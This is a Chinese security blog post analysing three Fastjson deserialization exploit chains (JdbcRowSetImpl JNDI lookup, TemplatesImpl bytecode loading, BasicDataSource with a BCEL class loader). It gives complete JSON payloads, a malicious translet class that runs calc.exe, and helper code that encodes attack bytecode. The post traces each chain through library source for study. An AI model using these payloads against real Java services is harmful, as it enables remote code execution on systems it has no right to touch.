一起来看看Fastjson的三种漏洞利用链
作者 | 4ra1n
来源 | https://www.anquanke.com/post/id/248892
Fastjson已被大家分析过很多次,本文主要是对三种利用链做分析和对比
JdbcRowSetImpl
String payload = "{\n" +" \"a\":{\n" +" \"@type\":\"java.lang.Class\",\n" +" \"val\":\"com.sun.rowset.JdbcRowSetImpl\"\n" +" },\n" +" \"b\":{\n" +" \"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\n" +" \"dataSourceName\":\"rmi://127.0.0.1:1099/Exploit\",\n" +" \"autoCommit\":true\n" +" }\n" +"}";
JSON.parse(payload);
payload中的a对象用来当作缓存绕过,需要关注的是第二个对象
注意到其中"autoCommit":true
,反序列化时,会反射设置属性,调用com.sun.rowset.JdbcRowSetImpl.setAutoCommit()
public void setAutoCommit(boolean var1) throws SQLException {if (this.conn != null) {this.conn.setAutoCommit(var1);} else {// conn为空才会调用到这里this.conn = this.connect();this.conn.setAutoCommit(var1);}}
跟入com.sun.rowset.JdbcRowSetImpl.connect()
,触发lookup
,加载远程恶意对象
protected Connection connect() throws SQLException {if (this.conn != null) {return this.conn;} else if (this.getDataSourceName() != null) {try {// conn为空且dataSourceName不为空才会到这里InitialContext var1 = new InitialContext();// 成功触发JNDI注入DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
根据lookup到com.sun.jndi.rmi.registry.RegistryContext.lookup()
public Object lookup(Name var1) throws NamingException {if (var1.isEmpty()) {......return this.decodeObject(var2, var1.getPrefix(1));}}
跟入decodeObject
方法,看到加载了远程Reference
绑定的恶意对象
Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;
return NamingManager.getObjectInstance(var3, var2, this, this.environment);
总结:
实战可以利用,JDNI注入基于较低版本的JDK,LDAP适用范围更广
必须能出网,加载远端的恶意字节码,造成了局限性
TemplateImpl
String payload = "{\"a\":{\n" +"\"@type\":\"java.lang.Class\",\n" +"\"val\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"\n" +"},\n" +"\"b\":{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +"\"_bytecodes\":[\"!!!Payload!!!\"],\"_name\":\"a.b\",\"_tfactory\":{},\"_outputProperties\":{}}";
JSON.parse(payload, Feature.SupportNonPublicField);
注意其中的Payload来自于恶意类,该类应该继承自com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet
public class TEMPOC extends AbstractTranslet {public TEMPOC() throws IOException {Runtime.getRuntime().exec("calc.exe");}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {}public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException {}public static void main(String[] args) throws Exception {TEMPOC t = new TEMPOC();}
}
类似第一条链,使用两个对象绕过,其中的Payload为恶意类的字节码再Base64编码的结果,给出简易的py脚本
fin = open(r"PATH-TO-TEMPOC.class", "rb")
byte = fin.read()
fout = base64.b64encode(byte).decode("utf-8")
print(fout)
该链需要开启Feature.SupportNonPublicField
参数再反射设置属性,查看官方说明,如果某属性不存在set方法,但还想设置值时,需要开启该参数,这里的情况正好符合,而实际项目中很少出现这种情况,导致该链较鸡肋,没有实际的意义(其实TemplateImpl
类中有set方法,比如setTransletBytecodes
,但是名称和Bytecodes
不一致)
在com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.parseField
设置属性时会有判断
final int mask = Feature.SupportNonPublicField.mask;
if (fieldDeserializer == null&& (lexer.isEnabled(mask)|| (this.beanInfo.parserFeatures & mask) != 0)) {......
反序列化时,fastjson中会把”_”开头的属性替换为空。并在outputProperties
设置值时调用getOutputProperties
public synchronized Properties getOutputProperties() {try {return newTransformer().getOutputProperties();}catch (TransformerConfigurationException e) {return null;}}
调用到com.sun.org.apache.xalan.internal.xsltc.trax.newTransformer
方法
transformer = new TransformerImpl(getTransletInstance(), _outputProperties, _indentNumber, _tfactory);
跟入getTransletInstance
// name不能为空所以在payload中设置a.b
if (_name == null) return null;
// 关键
if (_class == null) defineTransletClasses();// The translet needs to keep a reference to all its auxiliary
// class to prevent the GC from collecting them
AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
再跟入defineTransletClasses
,对父类进行了验证,这样解释了为什么Payload恶意类要继承自该类。如果验证没有问题,将在上方的newInstance
方法中实例化该类,造成RCE
private static String ABSTRACT_TRANSLET= "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";if (superClass.getName().equals(ABSTRACT_TRANSLET)) {_transletIndex = i;
}
为什么_bytescode
要对字节码进行base64编码?反序列化的过程中会调用很多类,在经过该类com.alibaba.fastjson.serializer.ObjectArrayCodec.deserialze
的时候,会对字段进行一次base64的解码
......
if (token == JSONToken.LITERAL_STRING || token == JSONToken.HEX) {byte[] bytes = lexer.bytesValue();......
跟入lexer.bytesValue()
方法,看到decodeBase64
public byte[] bytesValue() {......// base64解码return IOUtils.decodeBase64(buf, np + 1, sp);
}
总结:
TemplatesImpl类是Java反序列化界比较常用的类,更容易理解和上手
需要开启
Feature.SupportNonPublicField
,实战中不适用
BasicDataSource
String payload = "{\n" +" \"name\":\n" +" {\n" +" \"@type\" : \"java.lang.Class\",\n" +" \"val\" : \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"\n" +" },\n" +" \"x\" : {\n" +" \"name\": {\n" +" \"@type\" : \"java.lang.Class\",\n" +" \"val\" : \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +" },\n" +" \"y\": {\n" +" \"@type\":\"com.alibaba.fastjson.JSONObject\",\n" +" \"c\": {\n" +" \"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +" \"driverClassLoader\": {\n" +" \"@type\" : \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +" },\n" +" \"driverClassName\":\"!!!Payload!!!\",\n" +"\n" +" \"$ref\": \"$.x.y.c.connection\"\n" +"\n" +" }\n" +" }\n" +" }\n" +"}";
JSON.parse(payload);
这个Payload适用于1.2.37版本,并且需要导入Tomcat相关的包
<dependencies><dependency><groupId>com.alibaba</groupId><artifactId>fastjson</artifactId><version>1.2.37</version></dependency><dependency><groupId>org.apache.tomcat</groupId><artifactId>tomcat-dbcp</artifactId><version>8.0.36</version></dependency>
</dependencies>
生成driverClassName
的工具如下
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.Repository;public class Test {public static void main(String[] args) throws Exception {JavaClass cls = Repository.lookupClass(Exp.class);String code = Utility.encode(cls.getBytes(), true);code = "$$BCEL$$" + code;new ClassLoader().loadClass(code).newInstance();System.out.println(code);}
}
BCEL的全名是Apache Commons BCEL,Apache Commons项目下的一个子项目,包含在JDK的原生库中。我们可以通过BCEL提供的两个类 Repository 和 Utility 来利用:Repository 用于将一个Java Class先转换成原生字节码,当然这里也可以直接使用javac命令来编译java文件生成字节码;Utility 用于将原生的字节码转换成BCEL格式的字节码。
生成的BCEL格式大概如下:
$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQ$......
将这种格式的字符串,作为“字节码”传入new ClassLoader().loadClass(code).newInstance();
将会被实例化,当我们在Fastjson反序列化中构造出这种链,将会造成反序列化漏洞
回到Payload,开头一部分用于绕Fastjson黑白名单,没有什么特殊的意义,核心部分如下:
"x" : {"name": {"@type" : "java.lang.Class","val" : "com.sun.org.apache.bcel.internal.util.ClassLoader"},"y": {"@type":"com.alibaba.fastjson.JSONObject","c": {"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"!!!Payload!!!","$ref": "$.x.y.c.connection"}}
}
这个版本利用的是$ref
这个特性:当fastjson版本>=1.2.36时,我们可以使用$ref
的方式来调用任意的getter,比如这个Payload调用的是x.y.c.connection
,x是这个大对象,最终调用的是c对象的connection方法,也就是BasicDataSource.connection
参考代码com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.deserialze:591
if ("$ref" == key && context != null) {// 传入的ref是$.x.y.c.connection,匹配到elseif ("@".equals(ref)) {...} else if ("..".equals(ref)) {...} else if ("$".equals(ref)) {...} else {Object refObj = parser.resolveReference(ref);if (refObj != null) {object = refObj;} else {// 将$.x.y.c.connection加入到Taskparser.addResolveTask(new ResolveTask(context, ref));parser.resolveStatus = DefaultJSONParser.NeedToResolve;}}
}
// 处理后设置到context
parser.setContext(context, object, fieldName);
漏洞的触发点在com.alibaba.fastjson.JSON.parse:154
parser.handleResovleTask(value);
跟入com.alibaba.fastjson.parser.DefaultJSONParser.handleResovleTask:1465
if (ref.startsWith("$")) {refValue = getObject(ref);if (refValue == null) {try {// 看到eval感觉有东西refValue = JSONPath.eval(value, ref);} catch (JSONPathException ex) {// skip}}
}
跟入JSONPath.eval
,这里的segement
数组中的是[x,y,c,connection]
public Object eval(Object rootObject) {if (rootObject == null) {return null;}init();Object currentObject = rootObject;for (int i = 0; i < segments.length; ++i) {Segement segement = segments[i];// 继续跟入currentObject = segement.eval(this, rootObject, currentObject);}return currentObject;
}
到达com.alibaba.fastjson.JSONPath:1350
public Object eval(JSONPath path, Object rootObject, Object currentObject) {if (deep) {List<Object> results = new ArrayList<Object>();path.deepScan(currentObject, propertyName, results);return results;} else {// return path.getPropertyValue(currentObject, propertyName, true);return path.getPropertyValue(currentObject, propertyName, propertyNameHash);}
}
继续跟入path.getPropertyValue
protected Object getPropertyValue(Object currentObject, String propertyName, long propertyNameHash) {if (currentObject == null) {return null;}if (currentObject instanceof Map) {Map map = (Map) currentObject;Object val = map.get(propertyName);if (val == null && SIZE == propertyNameHash) {val = map.size();}return val;}final Class<?> currentClass = currentObject.getClass();JavaBeanSerializer beanSerializer = getJavaBeanSerializer(currentClass);if (beanSerializer != null) {try {// 最后一次循环到达这里return beanSerializer.getFieldValue(currentObject, propertyName, propertyNameHash, false);} catch (Exception e) {throw new JSONPathException("jsonpath error, path " + path + ", segement " + propertyName, e);}}
跟入com.alibaba.fastjson.serializer.JavaBeanSerializer:439
public Object getFieldValue(Object object, String key, long keyHash, boolean throwFieldNotFoundException) {FieldSerializer fieldDeser = getFieldSerializer(keyHash);......// 跟入return fieldDeser.getPropertyValue(object);
}
跟入com.alibaba.fastjson.serializer.FieldSerializer:145
public Object getPropertyValue(Object object) throws InvocationTargetException, IllegalAccessException {Object propertyValue = fieldInfo.get(object);
到达com.alibaba.fastjson.util.FieldInfo
,达到最终触发点:method.invoke
public Object get(Object javaObject) throws IllegalAccessException, InvocationTargetException {return method != null? method.invoke(javaObject): field.get(javaObject);
}
看到这里的javaObject正是BasicDataSouce
回到BasicDataSource
本身
public Connection getConnection() throws SQLException {if (Utils.IS_SECURITY_ENABLED) {// 跟入final PrivilegedExceptionAction<Connection> action = new PaGetConnection();try {return AccessController.doPrivileged(action);} catch (final PrivilegedActionException e) {final Throwable cause = e.getCause();if (cause instanceof SQLException) {throw (SQLException) cause;}throw new SQLException(e);}}return createDataSource().getConnection();
}private class PaGetConnection implements PrivilegedExceptionAction<Connection> {@Overridepublic Connection run() throws SQLException {// 跟入createDataSource()return createDataSource().getConnection();}}
// 继续跟入createConnectionFactory()
final ConnectionFactory driverConnectionFactory = createConnectionFactory();
最终触发点,其中driverClassName
和driverClassLoader
都是可控的,由用户输入,指定ClassLoader为com.sun.org.apache.bcel.internal.util.ClassLoader
,设置ClassName为BCEL...
这种格式后,在newInstance
方法执行后被实例化。第二个参数initial
为true时,类加载后将会直接执行static{}
块中的代码。
if (driverClassLoader == null) {driverFromCCL = Class.forName(driverClassName);
} else {driverFromCCL = Class.forName(driverClassName, true, driverClassLoader);
}
...
driverFromCCL = Thread.currentThread().getContextClassLoader().loadClass(driverClassName);
...
driverToUse = (Driver) driverFromCCL.newInstance();
总结:
不需要出网,不需要开启特殊的参数,适用范围较广
目标需要引入tomcat依赖,虽说比较常见,但也是一种限制
往期推荐
YYDS!怪不得很多朋友去杭州,原来有10W+的福利!
2021 年 8 月程序员工资出炉啦!北京以18904元位居榜首
一做就是一天,这一天天的谁受得了
居然有老板禁止员工热饭:要么吃冷的,要么找人送...
Spring Security实战干货:集成微信公众号OAuth2.0授权
喜欢本文欢迎转发,关注我订阅更多精彩
关注我回复「加群」,加入Spring技术交流群
一起来看看Fastjson的三种漏洞利用链相关推荐
- php支持链式操作,PHP三种方式实现链式操作-php教程
正在php中有不少字符串函数,例如要先过滤字符串收尾的空格,再求出其长度,普通的写法是: strlen(trim($str)) 假如要完成相似js中的链式操作,比方像上面这样应该怎样写? $str-& ...
- 6-java安全——java反序列化漏洞利用链
本篇将结合一个apache commons-collections组件来学习java反序列化漏洞原理,以及如何构造利用链. 我们知道序列化操作主要是由ObjectOutputStream类的 writ ...
- php 声音文件链 处理,PHP 三种方式实现链式操作
在php中有很多字符串函数,例如要先过滤字符串收尾的空格,再求出其长度,一般的写法是: strlen(trim($str)) 如果要实现类似js中的链式操作,比如像下面这样应该怎么写? $str-&g ...
- Stapler-1靶场详细教学(7种漏洞利用+5种提权)
目录 前言 简介 信息收集 0x00 主机发现 0x01 端口探测 0x02 信息收集-1 0x03 信息收集-2 0x04 漏洞利用-1 0x05 信息收集-3 0x06 漏洞利用-2 0x07 漏 ...
- Metasploit技术(三)——漏洞利用
目录 四.漏洞利用 四.漏洞利用 每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统,微软公司会快速地开发针对这些Bug或漏洞地补丁,并为用户提供更新.全世界有大量地漏洞研究人员 ...
- Chrome 0 day漏洞利用链
远程代码执行漏洞利用 所有的攻击活动都是通过Chrome浏览器执行的.虽然研究人员无法获取漏洞利用的JS代码,但是研究人员根据相关攻击活动的时间轴推测出了利用的漏洞--CVE-2021-21224.此 ...
- 【渗透】Redis 未授权访问漏洞利用(三种利用方式)
起序:是因为我同学的云服务器被黑了,被挖矿了,原因就是 redis 可以未授权访问,还是 root 级别的,我直接好家伙,整理记录一下. 一.软件环境 虚拟机:VMware Workstation 1 ...
- list集合去重的三种方式
第一种利用两个for循环比较,然后删除重复元素 for(int i = 0; i < array.size(); i++){for(int j =i+1;j<array.size();j+ ...
- RestTemplate的三种使用方式
RestTemplate是一个HTTP客户端,相信大家在HTTP Client里面都有用过HTTP Client,RestTemplate和他功能差不多,用法上他更加的简单,我们使用订单服务区调用商品 ...
最新文章
- 深度学习:yolo v3训练结果测试
- ROS通信架构(上)
- java 内存屏障类型_Java内存模型精讲
- Open SAP 上 SAP Fiori Elements 公开课第一单元学习笔记
- springaop----springaop的使用(一)
- 远程分支显示不全 idea_IDEA中的Git操作,看完你就会了
- Soft Bellman Equation and Soft Value Iteration证明
- SQLSERVER存储过程实例(上)
- 分享一个好用的网页pdf打印插件
- 从投入产出简析直复营销
- U盘可以被电脑识别,但无法读取U盘里的内容
- 此文让你至少走三年弯路
- 浙江大学 工程伦理 第十一章单元测试答案
- yshon对讲机如何调频率_对讲机设置LT6100设置频率的方法
- 成都奔驰加装原厂无钥匙舒适进入 蔚一名车汇
- vue---museui解决底部/顶部导航栏位置固定问题
- 便捷式备份系统并还原
- a 标签链接 设置点击下载文件
- 腿式机器人点足站立平衡-VSMC
- 最简单的炒股赚钱方法